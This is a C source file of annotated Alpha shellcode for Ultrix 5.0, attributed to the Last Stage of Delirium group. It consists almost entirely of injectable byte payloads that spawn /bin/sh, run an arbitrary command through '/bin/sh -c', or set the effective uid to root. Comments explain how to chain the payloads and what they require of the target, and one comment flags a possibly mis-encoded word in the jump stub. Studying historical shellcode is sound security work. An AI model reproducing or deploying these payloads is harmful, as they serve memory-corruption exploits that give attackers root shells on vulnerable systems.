/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for ultrix 5.0 alpha                                           #*/

/*
syscall     %v0  %a0,%a1,%a2,%a3
----------- ---- ---------------------------------------------------------------
execv       x00b ->path="/bin/sh",->[->a0=path,0]
execv       x00b ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setreuid    x07e ruid,euid=0
*/

#if defined(ALPHA) && defined(ULTRIX)

/*
 * execv("/bin/sh", {"/bin/sh", 0}) -- first row of the table above.
 *
 * 18 instruction words followed by the 7-byte path.  sizeof shellcode
 * also counts the literal's terminating NUL, so the code length is
 * sizeof shellcode - 1 (79 bytes); none of the encoded words contains a
 * zero byte, so strlen() gives the same value.
 *
 * Words 1-5 recover the current PC: ldah/lda assemble 0x6bfa8001, the
 * same "ret zero,(ra),1" encoding found in jump[] below, store it at
 * sp+320 and jsr to it, so the ret comes straight back with ra holding
 * the address of the following word.  After the rebias in word 6 every
 * data address is an ra-relative displacement, i.e. the code is
 * position independent.
 *
 * The syscall is made by storing the word 0x00000083 at sp+8320 and
 * jumping to it (on Alpha this is the call_pal callsys encoding --
 * confirm against the target PALcode), so a writable and executable
 * stack is required.  v0 = 699 - 688 = 0x0b, the execv number from the
 * table above.
 *
 * NOTE(review): with ra = code+20-32128, the stq's at 32196(ra) and
 * 32204(ra) resolve to code+88 and code+96 -- past the end of this
 * 80-byte literal.  argv is built in whatever memory follows the
 * injected copy, which must therefore be writable.
 */
char shellcode[]=          /* 18*4+7 bytes (+1 for the NUL)  */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)   a3 = 0x6bfb0000 */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)    a3 = 0x6bfa8001 = ret zero,(ra),1 */
    "\x40\x01\x7e\xb2"     /* stl     a3,320(sp)       ret word onto the stack */
    "\x40\x01\x9e\x22"     /* lda     a4,320(sp)                       */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10     ra <- address of the next word */
    "\x80\x82\x5a\x23"     /* lda     ra,-32128(ra)    rebias: ra = code+20-32128 */
    "\x12\x04\xff\x47"     /* bis     zero,zero, a2    a2 = 0          */
    "\xbb\x7d\xfa\x3b"     /* stb     zero,32187(ra)   code+79: NUL after "/bin/sh" */
    "\xb4\x7d\x1a\x22"     /* lda     a0,32180(ra)     code+72: path  */
    "\xc4\x7d\x1a\xb6"     /* stq     a0,32196(ra)     code+88: argv[0] = path */
    "\xc4\x7d\x3a\x22"     /* lda     a1,32196(ra)     a1 = argv      */
    "\xcc\x7d\xfa\xb7"     /* stq     zero,32204(ra)   code+96: argv[1] = 0 */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3     callsys word   */
    "\x80\x20\x7e\xb2"     /* stl     a3,8320(sp)                     */
    "\x80\x20\x9e\x22"     /* lda     a4,8320(sp)                     */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)                    */
    "\x50\xfd\x15\x20"     /* lda     v0,-688(a5)      699-688 = 0x0b = execv (bytes 0xfd50; the old "-640" comment was a typo, cf. the identical word in cmdshellcode[]) */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10     execute the callsys word */
    "/bin/sh"
;

/*
 * execv("/bin/sh", {"/bin/sh", "-c", cmd, 0}) -- second row of the
 * table above.
 *
 * 22 instruction words followed by the 12-byte literal "/bin/sh -c  ";
 * sizeof cmdshellcode also counts the terminating NUL, so the code
 * length is sizeof cmdshellcode - 1 (100 bytes).  The original
 * "22*4+7" size comment undercounted the literal.  There are no
 * embedded zero bytes.
 *
 * Words 1-6 are the same PC-recovery sequence as in shellcode[] (build
 * the 0x6bfa8001 "ret zero,(ra),1" word, jsr to it, rebias ra).  With
 * ra = code+20-32128 the displacements below resolve to offsets from
 * the start of the code:
 *   32203 -> +95   NUL after "/bin/sh"     32206 -> +98  NUL after "-c"
 *   32196 -> +88   "/bin/sh"               32204 -> +96  "-c"
 *   32208 -> +100  first byte after the literal: the command string,
 *                  which the caller presumably appends, NUL-terminated
 *   32092 / 32100 / 32108 / 32116 -> -16, -8, +0, +8: argv[0..3]
 *
 * NOTE(review): argv is written starting 16 bytes before the code and
 * over its first four words (already executed by then), so the memory
 * in front of the injected copy must be writable.  The syscall is made
 * as in shellcode[]: callsys word 0x83 stored at sp+8320 and jumped to,
 * which needs an executable stack.
 */
char cmdshellcode[]=       /* 22*4+12 bytes (+1 for the NUL) */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)   a3 = 0x6bfb0000 */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)    a3 = 0x6bfa8001 = ret zero,(ra),1 */
    "\x40\x01\x7e\xb2"     /* stl     a3,320(sp)       ret word onto the stack */
    "\x40\x01\x9e\x22"     /* lda     a4,320(sp)                       */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10     ra <- address of the next word */
    "\x80\x82\x5a\x23"     /* lda     ra,-32128(ra)    rebias: ra = code+20-32128 */
    "\xcb\x7d\xfa\x3b"     /* stb     zero,32203(ra)   code+95: terminate "/bin/sh" */
    "\xce\x7d\xfa\x3b"     /* stb     zero,32206(ra)   code+98: terminate "-c" */
    "\xc4\x7d\x1a\x22"     /* lda     a0,32196(ra)     code+88: path  */
    "\x5c\x7d\x1a\xb6"     /* stq     a0,32092(ra)     code-16: argv[0] = path */
    "\xcc\x7d\x7a\x22"     /* lda     a3,32204(ra)     code+96: "-c"  */
    "\x64\x7d\x7a\xb6"     /* stq     a3,32100(ra)     code-8:  argv[1] = "-c" */
    "\xd0\x7d\x7a\x22"     /* lda     a3,32208(ra)     code+100: command string */
    "\x6c\x7d\x7a\xb6"     /* stq     a3,32108(ra)     code+0:  argv[2] = cmd */
    "\x74\x7d\xfa\xb7"     /* stq     zero,32116(ra)   code+8:  argv[3] = 0 */
    "\x5c\x7d\x3a\x22"     /* lda     a1,32092(ra)     a1 = argv (code-16) */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3     callsys word   */
    "\x80\x20\x7e\xb2"     /* stl     a3,8320(sp)                     */
    "\x80\x20\x9e\x22"     /* lda     a4,8320(sp)                     */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)                    */
    "\x50\xfd\x15\x20"     /* lda     v0,-688(a5)      699-688 = 0x0b = execv */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10     execute the callsys word */
    "/bin/sh -c  "
;

/*
 * setreuid(-1, 0) -- third row of the table above.  a0 = -1 leaves the
 * real uid unchanged, a1 = 0 sets the effective uid to 0 (root).
 *
 * 11 instruction words, no data and no zero bytes; code length is
 * sizeof setreuidcode - 1 (44 bytes).
 *
 * Unlike the two execv payloads this block needs no PC: it stores the
 * callsys word (0x83) at sp+640 and the 0x6bfa8001 "ret zero,(ra),1"
 * word directly behind it at sp+644, then jsr's to sp+640.  The syscall
 * executes and the ret returns to the word after the jsr -- i.e. to
 * whatever is placed immediately after these 44 bytes -- so the block
 * is presumably meant to be prefixed to shellcode[] or cmdshellcode[].
 * Like them it relies on a writable, executable stack.
 */
char setreuidcode[]=       /* 11*4 bytes (+1 for the NUL)    */
    "\xff\xff\x1f\x22"     /* lda     a0,-1(zero)      ruid = -1 (unchanged) */
    "\x11\x04\xff\x47"     /* bis     zero,zero,a1     euid = 0       */
    "\xbb\x02\xbf\x22"     /* lda     a5,699(zero)                    */
    "\xc3\xfd\x15\x20"     /* lda     v0,-573(a5)      699-573 = 0x7e = setreuid */
    "\x13\x74\xf0\x47"     /* bis     zero,0x83,a3     callsys word   */
    "\x80\x02\x7e\xb2"     /* stl     a3,640(sp)                      */
    "\x80\x02\x9e\x22"     /* lda     a4,640(sp)                      */
    "\xfb\x6b\x7f\x26"     /* ldah    a3,27643(zero)   a3 = 0x6bfb0000 */
    "\x01\x80\x73\x22"     /* lda     a3,-32767(a3)    a3 = 0x6bfa8001 = ret zero,(ra),1 */
    "\x84\x02\x7e\xb2"     /* stl     a3,644(sp)       ret word right behind callsys */
    "\x10\x40\x54\x6b"     /* jsr     ra,(a4),0x10     callsys, then ret to the next word */
;

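/*
 * Two-word stub: v0 = sp, then return through ra.  Its second word,
 * 0x6bfa8001 ("ret zero,(ra),1"), is the same encoding the three
 * payloads above assemble at run time to recover their PC.
 *
 * Escapes are written as two-digit hex like the rest of this file (the
 * original used octal \00 / \01 for the first byte of each word); the
 * bytes themselves are unchanged.
 *
 * The first byte is 0x00, so strlen(jump) is 0 -- use sizeof jump - 1
 * (8 bytes) for the code length.
 *
 * NOTE(review): the first word as written is 0x47de4000.  In the other
 * "bis" words of this file (0x47ff0412 "bis zero,zero,a2", 0x47ff0411
 * "bis zero,zero,a1") the function field lives in a low halfword of the
 * form 0x04xx; here it is 0x4000, which does not match the
 * "bis sp,sp,v0" comment and looks like a swapped second byte
 * (0x04 -> 0x40).  Verify against the original source before relying on
 * this word; it is left as found here.
 */
char jump[]=
    "\x00\x40\xde\x47"     /* bis     sp,sp,v0    (see NOTE above)  */
    "\x01\x80\xfa\x6b"     /* ret     zero,(ra),1                   */
;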

#endif
